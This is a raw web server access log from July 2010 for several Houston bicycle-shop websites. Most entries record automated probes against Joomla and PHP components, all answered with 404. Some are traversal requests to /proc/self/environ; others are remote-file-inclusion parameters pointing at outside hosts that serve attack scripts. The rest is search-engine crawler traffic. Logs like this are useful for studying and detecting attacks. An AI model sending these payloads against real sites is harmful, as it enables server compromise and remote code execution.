91.121.92.195 - - [09/Jul/2010:17:03:36 -0700] "GET /logs/access.log//components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "houstonbikeshop.com"
91.121.92.195 - - [09/Jul/2010:17:03:36 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "houstonbikeshop.com"
91.121.92.195 - - [09/Jul/2010:17:03:37 -0700] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "houstonbikeshop.com"
91.121.21.215 - - [09/Jul/2010:17:08:07 -0700] "GET /logs/access_100510.log//happycast_category_lightblack/login.php?dir=http://server4.fileave.com/respon.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.svbikes.com"
91.121.21.215 - - [09/Jul/2010:17:08:07 -0700] "GET /happycast_category_lightblack/login.php?dir=http://server4.fileave.com/respon.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.svbikes.com"
91.121.21.215 - - [09/Jul/2010:17:08:07 -0700] "GET /logs//happycast_category_lightblack/login.php?dir=http://server4.fileave.com/respon.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.svbikes.com"
91.121.21.215 - - [09/Jul/2010:17:12:47 -0700] "GET /logs/access_100510.log//error.php?dir=http://server4.fileave.com/respon.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.svbikes.com"
91.121.21.215 - - [09/Jul/2010:17:12:47 -0700] "GET /error.php?dir=http://server4.fileave.com/respon.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.svbikes.com"
91.121.21.215 - - [09/Jul/2010:17:12:47 -0700] "GET /logs//error.php?dir=http://server4.fileave.com/respon.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.svbikes.com"
208.116.46.5 - - [09/Jul/2010:17:13:45 -0700] "GET /logs//happycast_category_lightblack/login.php?dir=http://server4.fileave.com/respon.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.svbikes.com"
208.116.46.5 - - [09/Jul/2010:17:13:45 -0700] "GET /happycast_category_lightblack/login.php?dir=http://server4.fileave.com/respon.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.svbikes.com"
66.249.65.8 - - [09/Jul/2010:17:14:23 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Googlebot-Image/1.0" "bicyclestoreshouston.com"
66.249.65.36 - - [09/Jul/2010:17:14:23 -0700] "GET /P1000199.JPG HTTP/1.1" 200 1640919 "-" "Googlebot-Image/1.0" "bicyclestoreshouston.com"
208.116.46.5 - - [09/Jul/2010:17:14:51 -0700] "GET /logs/access_100510.log//error.php?dir=http://server4.fileave.com/respon.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.svbikes.com"
208.116.46.5 - - [09/Jul/2010:17:14:52 -0700] "GET /error.php?dir=http://server4.fileave.com/respon.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.svbikes.com"
208.116.46.5 - - [09/Jul/2010:17:14:52 -0700] "GET /logs//error.php?dir=http://server4.fileave.com/respon.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.svbikes.com"
85.214.85.210 - - [09/Jul/2010:17:15:48 -0700] "GET /logs/scripts.log%20%20//index.php?option=com_banners&controller=http://www.lagacetaonline.net/archivo/Ckrid1.txt?? HTTP/1.1" 404 - "-" "kmccrew Bot Search" "bicyclestoreshouston.com"
85.214.85.210 - - [09/Jul/2010:17:15:48 -0700] "GET /logs//index.php?option=com_banners&controller=http://www.lagacetaonline.net/archivo/Ckrid1.txt?? HTTP/1.1" 404 - "-" "kmccrew Bot Search" "bicyclestoreshouston.com"
85.214.85.210 - - [09/Jul/2010:17:15:48 -0700] "GET /index.php?option=com_banners&controller=http://www.lagacetaonline.net/archivo/Ckrid1.txt?? HTTP/1.1" 404 - "-" "kmccrew Bot Search" "bicyclestoreshouston.com"
208.116.46.5 - - [09/Jul/2010:17:17:58 -0700] "GET /logs/access_100510.log//setup.php?dir=http://server4.fileave.com/respon.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.svbikes.com"
208.116.46.5 - - [09/Jul/2010:17:17:58 -0700] "GET /setup.php?dir=http://server4.fileave.com/respon.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.svbikes.com"
208.116.46.5 - - [09/Jul/2010:17:17:59 -0700] "GET /logs//error.php?dir=http://server4.fileave.com/respon.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.svbikes.com"
208.116.46.5 - - [09/Jul/2010:17:17:59 -0700] "GET /logs//setup.php?dir=http://server4.fileave.com/respon.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.svbikes.com"
208.116.46.5 - - [09/Jul/2010:17:17:59 -0700] "GET /error.php?dir=http://server4.fileave.com/respon.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.svbikes.com"
208.116.46.5 - - [09/Jul/2010:17:23:09 -0700] "GET /logs//setup.php?dir=http://server4.fileave.com/respon.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.svbikes.com"
208.116.46.5 - - [09/Jul/2010:17:23:09 -0700] "GET /setup.php?dir=http://server4.fileave.com/respon.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.svbikes.com"
67.195.115.87 - - [09/Jul/2010:17:25:40 -0700] "GET /?N=D HTTP/1.0" 200 1748 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
201.116.197.150 - - [09/Jul/2010:17:28:37 -0700] "GET /logs/access.log//components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "houstonbikeshop.com"
201.116.197.150 - - [09/Jul/2010:17:28:37 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "houstonbikeshop.com"
201.116.197.150 - - [09/Jul/2010:17:28:38 -0700] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "houstonbikeshop.com"
85.214.85.210 - - [09/Jul/2010:17:31:56 -0700] "GET /index.php?option=com_banners&controller=http://www.lagacetaonline.net/archivo/Ckrid1.txt?? HTTP/1.1" 404 - "-" "kmccrew Bot Search" "bicyclestoreshouston.com"
85.214.85.210 - - [09/Jul/2010:17:31:56 -0700] "GET /logs//index.php?option=com_banners&controller=http://www.lagacetaonline.net/archivo/Ckrid1.txt?? HTTP/1.1" 404 - "-" "kmccrew Bot Search" "bicyclestoreshouston.com"
85.214.85.210 - - [09/Jul/2010:17:31:56 -0700] "GET /logs/scripts.log%20%20//index.php?option=com_banners&controller=http://www.lagacetaonline.net/archivo/Ckrid1.txt?? HTTP/1.1" 404 - "-" "kmccrew Bot Search" "bicyclestoreshouston.com"
94.125.250.2 - - [09/Jul/2010:17:32:20 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
94.125.250.2 - - [09/Jul/2010:17:32:20 -0700] "GET /logs/access_091110.log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
94.125.250.2 - - [09/Jul/2010:17:32:20 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
94.125.250.2 - - [09/Jul/2010:17:32:23 -0700] "GET /logs/access_091110.log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
94.125.250.2 - - [09/Jul/2010:17:32:23 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
94.125.250.2 - - [09/Jul/2010:17:32:23 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
94.125.250.2 - - [09/Jul/2010:17:32:32 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
94.125.250.2 - - [09/Jul/2010:17:32:32 -0700] "GET /logs/access_091110.log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
94.125.250.2 - - [09/Jul/2010:17:32:32 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
201.116.197.150 - - [09/Jul/2010:17:46:17 -0700] "GET /logs/access.log///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "houstonbikeshop.com"
201.116.197.150 - - [09/Jul/2010:17:46:18 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "houstonbikeshop.com"
201.116.197.150 - - [09/Jul/2010:17:46:18 -0700] "GET /logs///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "houstonbikeshop.com"
67.195.115.87 - - [09/Jul/2010:17:52:08 -0700] "GET /bullitinboard/viewtopic.php?p=14998 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
67.195.115.87 - - [09/Jul/2010:17:54:19 -0700] "GET /fit.html HTTP/1.0" 200 17443 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
87.250.252.242 - - [09/Jul/2010:17:54:41 -0700] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "houstonbikeshop.com"
61.220.23.239 - - [09/Jul/2010:18:05:29 -0700] "GET /logs/access.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
61.220.23.239 - - [09/Jul/2010:18:05:30 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
61.220.23.239 - - [09/Jul/2010:18:05:36 -0700] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
67.195.115.87 - - [09/Jul/2010:18:23:41 -0700] "GET /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.0" 200 518 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
61.220.23.239 - - [09/Jul/2010:18:25:45 -0700] "GET /logs/access.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
61.220.23.239 - - [09/Jul/2010:18:25:46 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
61.220.23.239 - - [09/Jul/2010:18:25:47 -0700] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
209.40.100.50 - - [09/Jul/2010:18:29:24 -0700] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://mountaincabinforrent.com/images/banners/e107/e107/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "houstonbikeshop.com"
209.40.100.50 - - [09/Jul/2010:18:29:24 -0700] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://mountaincabinforrent.com/images/banners/e107/e107/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "houstonbikeshop.com"
209.40.100.50 - - [09/Jul/2010:18:31:22 -0700] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://mountaincabinforrent.com/images/banners/e107/e107/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "houstonbikeshop.com"
81.21.78.22 - - [09/Jul/2010:18:31:33 -0700] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.highweald.org/logs/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "houstonbikeshop.com"
81.21.78.22 - - [09/Jul/2010:18:31:33 -0700] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://www.highweald.org/logs/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "houstonbikeshop.com"
188.120.32.164 - - [09/Jul/2010:18:31:35 -0700] "GET /logs/access_100510.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.fileden.com/files/2010/1/5/2714272/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
188.120.32.164 - - [09/Jul/2010:18:31:35 -0700] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.fileden.com/files/2010/1/5/2714272/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
188.120.32.164 - - [09/Jul/2010:18:31:35 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.fileden.com/files/2010/1/5/2714272/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
188.120.32.164 - - [09/Jul/2010:18:31:51 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.fileden.com/files/2010/1/5/2714272/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
188.120.32.164 - - [09/Jul/2010:18:31:51 -0700] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.fileden.com/files/2010/1/5/2714272/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
188.120.32.164 - - [09/Jul/2010:18:31:51 -0700] "GET /logs/access_100510.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.fileden.com/files/2010/1/5/2714272/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
69.175.127.170 - - [09/Jul/2010:18:32:55 -0700] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://www.highweald.org/logs/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "houstonbikeshop.com"
81.21.78.22 - - [09/Jul/2010:18:34:17 -0700] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://www.highweald.org/logs/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "houstonbikeshop.com"
87.250.252.242 - - [09/Jul/2010:18:47:38 -0700] "GET /logs/scripts.log HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "houstonbikeshop.com"
81.21.78.22 - - [09/Jul/2010:18:54:02 -0700] "GET /logs/access.log//bbs//skin/ggambo7002_board/write.php?dir=http://www.highweald.org/logs/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "houstonbikeshop.com"
81.21.78.22 - - [09/Jul/2010:18:54:03 -0700] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://www.highweald.org/logs/myid.jpg? HTTP/1.0" 404 - "-" "libwww-perl/5.803" "houstonbikeshop.com"
81.21.78.22 - - [09/Jul/2010:18:54:03 -0700] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.highweald.org/logs/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "houstonbikeshop.com"
69.175.127.170 - - [09/Jul/2010:19:05:35 -0700] "GET /logs/access.log//bbs//skin/ggambo7002_board/write.php?dir=http://www.highweald.org/logs/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "houstonbikeshop.com"
69.175.127.170 - - [09/Jul/2010:19:05:35 -0700] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://www.highweald.org/logs/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "houstonbikeshop.com"
69.175.127.170 - - [09/Jul/2010:19:05:35 -0700] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.highweald.org/logs/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "houstonbikeshop.com"
208.80.193.30 - - [09/Jul/2010:19:14:05 -0700] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; yplus 5.6.04)" "houstonbikeshop.com"
87.250.252.242 - - [09/Jul/2010:19:27:28 -0700] "GET /translations/Japanese.txt HTTP/1.1" 200 32739 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "houstonbikeshop.com"
209.116.59.107 - - [09/Jul/2010:19:39:01 -0700] "GET /logs/access.log/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
209.116.59.107 - - [09/Jul/2010:19:39:01 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
209.116.59.107 - - [09/Jul/2010:19:39:02 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
207.46.13.42 - - [09/Jul/2010:19:39:13 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
207.46.13.42 - - [09/Jul/2010:19:41:33 -0700] "GET / HTTP/1.1" 200 1764 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
67.195.115.87 - - [09/Jul/2010:20:01:40 -0700] "GET /bullitinboard/viewtopic.php?p=2570 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
74.117.56.225 - - [09/Jul/2010:20:03:11 -0700] "POST /logs/access.log/pingserver.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
74.117.56.225 - - [09/Jul/2010:20:03:11 -0700] "POST /logs/access.log/pingserver.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
74.117.56.225 - - [09/Jul/2010:20:03:11 -0700] "POST /pingserver.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
74.117.56.225 - - [09/Jul/2010:20:03:11 -0700] "POST /logs/pingserver.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
74.117.56.225 - - [09/Jul/2010:20:03:12 -0700] "POST /logs/access.log/pingserver.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
74.117.56.225 - - [09/Jul/2010:20:03:12 -0700] "POST /pingserver.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
74.117.56.225 - - [09/Jul/2010:20:03:12 -0700] "POST /logs/pingserver.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
74.117.56.225 - - [09/Jul/2010:20:03:12 -0700] "POST /logs/access.log/pingserver.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
74.117.56.225 - - [09/Jul/2010:20:03:12 -0700] "POST /pingserver.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
74.117.56.225 - - [09/Jul/2010:20:03:12 -0700] "POST /logs/access.log/pingserver.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
74.117.56.225 - - [09/Jul/2010:20:03:12 -0700] "POST /logs/pingserver.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
74.117.56.225 - - [09/Jul/2010:20:03:12 -0700] "POST /logs/access.log/pingserver.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
74.117.56.225 - - [09/Jul/2010:20:03:12 -0700] "POST /pingserver.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
74.117.56.225 - - [09/Jul/2010:20:03:12 -0700] "POST /logs/access.log/pingserver.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
74.117.56.225 - - [09/Jul/2010:20:03:12 -0700] "POST /pingserver.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
74.117.56.225 - - [09/Jul/2010:20:03:12 -0700] "POST /logs/pingserver.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
74.117.56.225 - - [09/Jul/2010:20:03:12 -0700] "POST /pingserver.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
74.117.56.225 - - [09/Jul/2010:20:03:12 -0700] "POST /logs/pingserver.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
74.117.56.225 - - [09/Jul/2010:20:03:13 -0700] "POST /pingserver.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
74.117.56.225 - - [09/Jul/2010:20:03:13 -0700] "POST /logs/pingserver.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
87.250.252.242 - - [09/Jul/2010:20:06:14 -0700] "GET /translations/Danish.txt HTTP/1.1" 200 31970 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "houstonbikeshop.com"
209.116.59.107 - - [09/Jul/2010:20:08:22 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
209.116.59.107 - - [09/Jul/2010:20:08:22 -0700] "GET /logs/access.log/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
209.116.59.107 - - [09/Jul/2010:20:08:23 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.195.112.217 - - [09/Jul/2010:20:08:24 -0700] "GET /bullitinboard/viewtopic.php?p=15814 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
64.59.100.3 - - [09/Jul/2010:20:39:41 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.swsltd.biz/templates/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.59.100.3 - - [09/Jul/2010:20:39:41 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.swsltd.biz/templates/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.59.100.3 - - [09/Jul/2010:20:39:41 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.swsltd.biz/templates/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.59.100.3 - - [09/Jul/2010:20:43:39 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.swsltd.biz/templates/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
88.151.101.141 - - [09/Jul/2010:21:05:16 -0700] "GET /logs/access.log//index.php?option=com_wmi&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "houstonbikeshop.com"
88.151.101.141 - - [09/Jul/2010:21:05:16 -0700] "GET /index.php?option=com_wmi&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "houstonbikeshop.com"
88.151.101.141 - - [09/Jul/2010:21:05:16 -0700] "GET /logs//index.php?option=com_wmi&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "houstonbikeshop.com"
88.151.101.141 - - [09/Jul/2010:21:05:38 -0700] "GET /index.php?option=com_wmi&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "houstonbikeshop.com"
88.151.101.141 - - [09/Jul/2010:21:05:46 -0700] "GET /index.php?option=com_wmi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "houstonbikeshop.com"
88.151.101.141 - - [09/Jul/2010:21:05:48 -0700] "GET /index.php?option=com_wmi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "houstonbikeshop.com"
88.151.101.141 - - [09/Jul/2010:21:06:09 -0700] "GET /logs/access.log//index.php?option=com_wmi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "houstonbikeshop.com"
88.151.101.141 - - [09/Jul/2010:21:06:10 -0700] "GET /index.php?option=com_wmi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "houstonbikeshop.com"
88.151.101.141 - - [09/Jul/2010:21:06:10 -0700] "GET /logs//index.php?option=com_wmi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "houstonbikeshop.com"
88.151.101.141 - - [09/Jul/2010:21:06:26 -0700] "GET /logs/access.log//index.php?option=com_wmi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "houstonbikeshop.com"
88.151.101.141 - - [09/Jul/2010:21:06:26 -0700] "GET /index.php?option=com_wmi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "houstonbikeshop.com"
88.151.101.141 - - [09/Jul/2010:21:06:26 -0700] "GET /logs//index.php?option=com_wmi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "houstonbikeshop.com"
87.250.252.242 - - [09/Jul/2010:21:14:53 -0700] "GET /logs/access_090810.log HTTP/1.1" 200 4425668 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "houstonbikeshop.com"
